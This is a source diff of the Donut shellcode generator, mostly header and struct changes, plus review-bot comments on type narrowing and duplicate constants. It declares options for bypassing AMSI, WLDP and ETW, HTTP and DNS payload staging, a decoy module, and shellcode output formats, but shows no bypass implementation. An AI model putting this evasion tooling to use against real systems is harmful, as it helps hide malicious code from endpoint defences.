359 int exit_opt; // 1 to call RtlExitUserProcess and terminate the host process
360 int entropy; // indicates entropy level
361 uint64_t oep; // original entrypoint
274362
275363 // everything from here is encrypted
276364 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
284
285 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
365 char dll_names[DONUT_MAX_NAME]; // a list of DLL strings to load, separated by semi-colon
366
367 char dataname[8]; // ".data"
368 char kernelbase[12]; // "kernelbase"
369 char amsi[8]; // "amsi"
370 char clr[4]; // "clr"
371 char wldp[8]; // "wldp"
372 char ntdll[8]; // "ntdll"
373
374 char cmd_syms[DONUT_MAX_NAME]; // symbols related to command line
375 char exit_api[DONUT_MAX_NAME]; // exit-related API
376
377 int bypass; // indicates behaviour of byassing AMSI/WLDP/ETW
378 int headers; // indicates whether to overwrite PE headers
288379 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289380 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290381 char amsiInit[16]; // AmsiInitialize
291382 char amsiScanBuf[16]; // AmsiScanBuffer
292383 char amsiScanStr[16]; // AmsiScanString
293
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
384 char etwEventWrite[16]; // EtwEventWrite
385 char etwEventUnregister[20]; // EtwEventUnregister
386 char etwRet64[1]; // "ret" instruction for Etw
387 char etwRet32[4]; // "ret 14h" instruction for Etw
388
389 char wscript[8]; // WScript
390 char wscript_exe[14]; // wscript.exe
391
392 char decoy[MAX_PATH * 2]; // path of decoy module
393
394 GUID xIID_IUnknown;
395 GUID xIID_IDispatch;
299396
300397 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
398 GUID xCLSID_CLRMetaHost;
399 GUID xIID_ICLRMetaHost;
400 GUID xIID_ICLRRuntimeInfo;
401 GUID xCLSID_CorRuntimeHost;
402 GUID xIID_ICorRuntimeHost;
403 GUID xIID_AppDomain;
307404
308405 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
406 GUID xCLSID_ScriptLanguage; // vbs or js
407 GUID xIID_IHost; // wscript object
408 GUID xIID_IActiveScript; // engine
409 GUID xIID_IActiveScriptSite; // implementation
410 GUID xIID_IActiveScriptSiteWindow; // basic GUI stuff
411 GUID xIID_IActiveScriptParse32; // parser
412 GUID xIID_IActiveScriptParse64;
413
414 int type; // DONUT_INSTANCE_EMBED, DONUT_INSTANCE_HTTP
415 char server[DONUT_MAX_NAME]; // staging server hosting donut module
416 char username[DONUT_MAX_NAME]; // username for web server
417 char password[DONUT_MAX_NAME]; // password for web server
418 char http_req[8]; // just a buffer for "GET"
419
420 uint8_t sig[DONUT_MAX_NAME]; // string to hash
421 uint64_t mac; // to verify decryption ok
330422
331423 DONUT_CRYPT mod_key; // used to decrypt module
332424 uint64_t mod_len; // total size of module
333425
334426 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
427 PDONUT_MODULE p; // Memory allocated for module downloaded via DNS or HTTP
428 DONUT_MODULE x; // Module is embedded
337429 } module;
338430 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339431
340432 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
433 uint32_t len, zlen; // original length of input file and compressed length
434 // general / misc options for loader
435 int arch; // target architecture
436 int bypass; // bypass option for AMSI/WDLP
437 int headers; // preserve PE headers option
438 int compress; // engine to use when compressing file via RtlCompressBuffer
439 int entropy; // entropy/encryption level
440 int format; // output format for loader
441 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
442 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
443 uint64_t oep; // original entrypoint of target host file
444
445 // files in/out
446 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
447 char output[DONUT_MAX_NAME]; // name of output file to save loader
448
449 // .NET stuff
450 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
451 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
452 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
453 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
454
455 // command line for DLL/EXE
456 char args[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
457 int unicode; // param is passed to DLL function without converting to unicode
458
459 // module overloading stuff
460 char decoy[2056]; // path of decoy module
461
462 // HTTP/DNS staging information
463 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote HTTP server or DNS server
464 char auth[DONUT_MAX_NAME]; // username and password for web server
465 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
466
467 // DONUT_MODULE
468 int mod_type; // VBS/JS/DLL/EXE
469 int mod_len; // size of DONUT_MODULE
470 DONUT_MODULE *mod; // points to DONUT_MODULE
471
472 // DONUT_INSTANCE
473 int inst_type; // DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP
474 int inst_len; // size of DONUT_INSTANCE
475 DONUT_INSTANCE *inst; // points to DONUT_INSTANCE
476
477 // shellcode generated from configuration
478 int pic_len; // size of loader/shellcode
479 void* pic; // points to loader/shellcode
362480 } DONUT_CONFIG, *PDONUT_CONFIG;
363481
364482 #ifdef __cplusplus
374492 // public functions
375493 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376494 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
495 EXPORT_FUNC const char* DonutError(int);
377496
378497 #ifdef __cplusplus
379498 }
Binary diff not shown
0 id ICON "donut.ico"
1
2 1 VERSIONINFO
3 FILEVERSION 0,9,3,0
4 PRODUCTVERSION 0,9,3,0
5 BEGIN
6 BLOCK "StringFileInfo"
7 BEGIN
8 BLOCK "080904E4"
9 BEGIN
10 VALUE "FileDescription", "Donut shellcode generator"
11 VALUE "FileVersion", "0.9.3"
12 VALUE "InternalName", "donut"
13 VALUE "OriginalFilename", "donut.exe"
14 VALUE "ProductName", "Donut"
15 VALUE "ProductVersion", "0.9.3"
16 END
17 END
18 BLOCK "VarFileInfo"
19 BEGIN
20 VALUE "Translation", 0x809, 1252
21 END
22 END
3333
3434 #include <stdint.h>
3535 #include <stddef.h>
36 #include <stdio.h>
3637
3738 #ifndef ROTR32
3839 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
4950 extern "C" {
5051 #endif
5152
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len);
5354
5455 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
5556
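Review bot: Narrowing `len` from `size_t` to `uint32_t` in `donut_encrypt` means a 64-bit caller that passes a larger length has it truncated silently at the call, and the callee cannot detect it. The same narrowing is applied to `Memset` (`unsigned int num`) and to the `mmap`/`munmap` shim and its prototypes further down this commit, where it also departs from the POSIX signature and from the `SIZE_T` byte count that `MapViewOfFile` accepts. If the 32-bit width is deliberate, state it next to the prototype, e.g. `// len is limited to 32 bits; callers must reject larger inputs`, and have callers range-check before the call. Otherwise keep `size_t`.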
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef FORMAT_H
32 #define FORMAT_H
33
34 #include "donut.h"
35
36 #ifdef __cplusplus
37 extern "C" {
38 #endif
39
40 int base64_template(void *pic, uint32_t pic_len, FILE *fd);
41 int c_ruby_template(void *pic, uint32_t pic_len, FILE *fd);
42 int py_template(void *pic, uint32_t pic_len, FILE* fd);
43 int powershell_template(void *pic, uint32_t pic_len, FILE *fd);
44 int csharp_template(void *pic, uint32_t pic_len, FILE *fd);
45 int hex_template(void *pic, uint32_t pic_len, FILE *fd);
46
47 #ifdef __cplusplus
48 }
49 #endif
50
51 #endif
52
3434 #include <stdint.h>
3535 #include <string.h>
3636
37 void *Memset (void *ptr, int value, size_t num);
37 void *Memset (void *ptr, int value, unsigned int num);
3838
3939 #define MARU_MAX_STR 64
4040 #define MARU_BLK_LEN 16
4444
4545 #ifndef ROTR32
4646 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifndef ROTL32
50 #define ROTL32(v,n)(((v)<<(n))|((v)>>(32-(n))))
4751 #endif
4852
4953 #ifdef __cplusplus
1212
1313 #include "mmap.h"
1414
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
15 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset)
1616 {
1717 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
1818 return MAP_FAILED;
5757 dwDesiredAccess |= FILE_MAP_COPY;
5858 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
5959 if (ret == NULL) {
60 CloseHandle(h);
6160 ret = MAP_FAILED;
6261 }
62 CloseHandle(h);
6363 return ret;
6464 }
6565
66 void munmap(void *addr, size_t length)
66 void munmap(void *addr, uint32_t length)
6767 {
6868 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
7069 }
7170
7271 #undef DWORD_HI
3434 extern "C" {
3535 #endif
3636
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
37 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, uint32_t length);
3939
4040 #ifdef __cplusplus
4141 }
66
77 #ifndef __WIN_TYPES
88 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
209
2110 #ifdef _MSC_VER
2211 #include <stdint.h>
7766 typedef uint16_t WCHAR;
7867 #endif
7968
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
8569 #ifndef VOID
8670 #define VOID void
8771 typedef char CHAR;
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
3838 #include <sys/stat.h>
3939 #include <inttypes.h>
4040
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
41 #if defined(_WIN32) || defined(_WIN64)
42 #define WINDOWS
43 #include <windows.h>
44 #else
45 #define LINUX
46 #include <unistd.h>
47 #include <dlfcn.h>
48 #endif
49
50 #define DONUT_ERROR_SUCCESS 0
51 #define DONUT_ERROR_FILE_NOT_FOUND 1
52 #define DONUT_ERROR_FILE_EMPTY 2
53 #define DONUT_ERROR_FILE_ACCESS 3
54 #define DONUT_ERROR_FILE_INVALID 4
55 #define DONUT_ERROR_NET_PARAMS 5
56 #define DONUT_ERROR_NO_MEMORY 6
57 #define DONUT_ERROR_INVALID_ARCH 7
58 #define DONUT_ERROR_INVALID_URL 8
59 #define DONUT_ERROR_URL_LENGTH 9
60 #define DONUT_ERROR_INVALID_PARAMETER 10
61 #define DONUT_ERROR_RANDOM 11
62 #define DONUT_ERROR_DLL_FUNCTION 12
63 #define DONUT_ERROR_ARCH_MISMATCH 13
64 #define DONUT_ERROR_DLL_PARAM 14
65 #define DONUT_ERROR_BYPASS_INVALID 15
66 #define DONUT_ERROR_INVALID_ENCODING 16
67 #define DONUT_ERROR_INVALID_ENGINE 17
68 #define DONUT_ERROR_COMPRESSION 18
69 #define DONUT_ERROR_INVALID_ENTROPY 19
70 #define DONUT_ERROR_MIXED_ASSEMBLY 20
71 #define DONUT_ERROR_HEADERS_INVALID 21
72 #define DONUT_ERROR_DECOY_INVALID 22
5773
5874 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
75 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
76 #define DONUT_ARCH_X86 1 // x86
77 #define DONUT_ARCH_X64 2 // AMD64
78 #define DONUT_ARCH_X84 3 // AMD64 + x86
6379
6480 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
81 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
82 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
83 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
84 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
85 #define DONUT_MODULE_VBS 5 // VBScript
86 #define DONUT_MODULE_JS 6 // JavaScript or JScript
87
88 // format type
89 #define DONUT_FORMAT_BINARY 1
90 #define DONUT_FORMAT_BASE64 2
91 #define DONUT_FORMAT_C 3
92 #define DONUT_FORMAT_RUBY 4
93 #define DONUT_FORMAT_PYTHON 5
94 #define DONUT_FORMAT_POWERSHELL 6
95 #define DONUT_FORMAT_CSHARP 7
96 #define DONUT_FORMAT_HEX 8
97
98 // compression engine
99 #define DONUT_COMPRESS_NONE 1
100 #define DONUT_COMPRESS_APLIB 2
101 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
102 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
103
104 // entropy level
105 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
106 #define DONUT_ENTROPY_RANDOM 2 // use random names
107 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
108
109 // misc options
110 #define DONUT_OPT_EXIT_THREAD 1 // return to the caller which calls RtlExitUserThread
111 #define DONUT_OPT_EXIT_PROCESS 2 // call RtlExitUserProcess to terminate host process
72112
73113 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
114 #define DONUT_INSTANCE_EMBED 1 // Self-contained
115 #define DONUT_INSTANCE_HTTP 2 // Download from remote HTTP/HTTPS server
116 #define DONUT_INSTANCE_DNS 3 // Download from remote DNS server
76117
77118 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
119 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
120 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
121 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
122
123 // Preserve PE headers options
124 #define DONUT_HEADERS_OVERWRITE 1 // Overwrite PE headers
125 #define DONUT_HEADERS_KEEP 1 // Preserve PE headers
126
127 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
128 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
129 #define DONUT_MAX_MODNAME 8
130 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
131 #define DONUT_VER_LEN 32
132 #define DONUT_DOMAIN_LEN 8
92133
93134 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
104
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
108
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
112
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
135 uint32_t len, zlen; // original length of input file and compressed length
136 // general / misc options for loader
137 int arch; // target architecture
138 int bypass; // bypass option for AMSI/WDLP
139 int headers; // preserve PE headers option
140 int compress; // engine to use when compressing file via RtlCompressBuffer
141 int entropy; // entropy/encryption level
142 int format; // output format for loader
143 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
144 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
145 uint64_t oep; // original entrypoint of target host file
146
147 // files in/out
148 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
149 char output[DONUT_MAX_NAME]; // name of output file to save loader
150
151 // .NET stuff
152 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
153 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
154 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
155 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
156
157 // command line for DLL/EXE
158 char param[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
159 int unicode; // param is converted to UNICODE before being passed to DLL function
160
161 // module overloading stuff
162 char decoy[MAX_PATH * 2]; // path of decoy module
163
164 // HTTP staging information
165 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote http server
166 char auth[DONUT_MAX_NAME]; // username and password for web server
167 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
168
169 // DONUT_MODULE
170 int mod_type; // VBS/JS/DLL/EXE
171 int mod_len; // size of DONUT_MODULE
172 void *mod; // points to DONUT_MODULE
173
174 // DONUT_INSTANCE
175 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_HTTP
176 int inst_len; // size of DONUT_INSTANCE
177 void *inst; // points to DONUT_INSTANCE
178
179 // shellcode generated from configuration
180 int pic_len; // size of loader/shellcode
181 void* pic; // points to loader/shellcode
115182 } DONUT_CONFIG, *PDONUT_CONFIG;
183
184 // function pointers
185 typedef int (__cdecl *DonutCreate_t)(PDONUT_CONFIG);
186 typedef int (__cdecl *DonutDelete_t)(PDONUT_CONFIG);
187 typedef const char* (__cdecl *DonutError_t)(int);
116188
117189 #ifdef __cplusplus
118190 extern "C" {
119191 #endif
120192
193 // prototypes
121194 int DonutCreate(PDONUT_CONFIG);
195 int DonutCreateWrapper(const char *);
122196 int DonutDelete(PDONUT_CONFIG);
197 const char* DonutError(int);
123198
124199 #ifdef __cplusplus
125200 }
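Review bot: `DONUT_HEADERS_OVERWRITE` and `DONUT_HEADERS_KEEP` are both defined as 1 (new lines 124-125), so any code comparing the `headers` field against either name cannot tell the two options apart. Give them distinct values, e.g. `#define DONUT_HEADERS_KEEP 2`, in line with the 1/2/3 numbering of the other option groups in this header. In the struct below, the `inst_type` comment still names `DONUT_INSTANCE_PIC`, which this commit renames to `DONUT_INSTANCE_EMBED`. `decoy[MAX_PATH * 2]` relies on `MAX_PATH`, which the non-Windows branch of the new `#if` block does not obviously define. The other `DONUT_CONFIG` definition earlier in this commit uses `decoy[2056]` and calls the command-line field `args` rather than `param`, so the two layouts look out of step and should be checked against each other.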
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 #ifdef DEBUG
55 // try resolve interface name for IID
56 PWCHAR iid2interface(PWCHAR riid) {
57 LSTATUS s;
58 HKEY hk;
59 WCHAR subkey[128];
60 static WCHAR name[128];
61 DWORD len = ARRAYSIZE(name);
62
63 // check under HKEY_CLASSES_ROOT\Interface\ for name
64
65 swprintf(subkey, ARRAYSIZE(subkey), L"Interface\\%s", riid) ;
66
67 s = SHGetValueW(
68 HKEY_CLASSES_ROOT,
69 subkey,
70 NULL,
71 0,
72 name,
73 &len);
74
75 if(s != ERROR_SUCCESS) return L"Not found";
76
77 return name;
78 }
79 #endif
80
81 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
82 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
83
84 #ifdef DEBUG
85 OLECHAR *iid;
86 HRESULT hr;
87
88 hr = StringFromIID(riid, &iid);
89 if(hr == S_OK) {
90 DPRINT("IActiveScriptSite::QueryInterface(%ws (%ws))", iid, iid2interface(iid));
91 CoTaskMemFree(iid);
92 } else {
93 DPRINT("StringFromIID failed");
94 }
95 #endif
96
97 if(ppv == NULL) return E_POINTER;
98
99 // we implement the following interfaces
100 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
101 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
102 {
103 DPRINT("Returning interface to IActiveScriptSite");
104 *ppv = (LPVOID)this;
105 ActiveScript_AddRef(this);
106 return S_OK;
107 } else if(IsEqualIID(&mas->inst->xIID_IActiveScriptSiteWindow, riid)) {
108 DPRINT("Returning interface to IActiveScriptSiteWindow");
109 *ppv = (LPVOID)&mas->siteWnd;
110 ActiveScriptSiteWindow_AddRef(&mas->siteWnd);
111 return S_OK;
112 }
113 DPRINT("Returning E_NOINTERFACE");
114 *ppv = NULL;
115 return E_NOINTERFACE;
116 }
117
118 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
119 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
120
121 _InterlockedIncrement(&mas->site.m_cRef);
122
